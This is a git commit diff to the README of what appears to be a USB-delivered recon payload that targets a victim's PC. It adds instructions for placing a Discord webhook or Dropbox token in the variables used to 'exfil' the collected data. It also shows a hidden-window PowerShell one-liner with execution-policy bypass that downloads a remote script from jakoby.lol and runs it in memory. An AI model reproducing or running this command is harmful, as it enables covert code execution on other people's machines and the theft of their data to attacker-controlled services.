Update README.md
This commit is contained in:
parent
53da733043
commit
3f05350a29
1 changed files with 7 additions and 0 deletions
|
@ -55,6 +55,13 @@ This program enumerates a target PC to collect as much recon data as possible fo
|
||||||
|
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||||
|
|
||||||
|
`$dc` is the variable that stores your discord webhook
|
||||||
|
|
||||||
|
`$db` is the variable that stores your dropbox token
|
||||||
|
|
||||||
|
Fill in either or both of these to methods to exfil your collected data
|
||||||
|
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
|
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in a new issue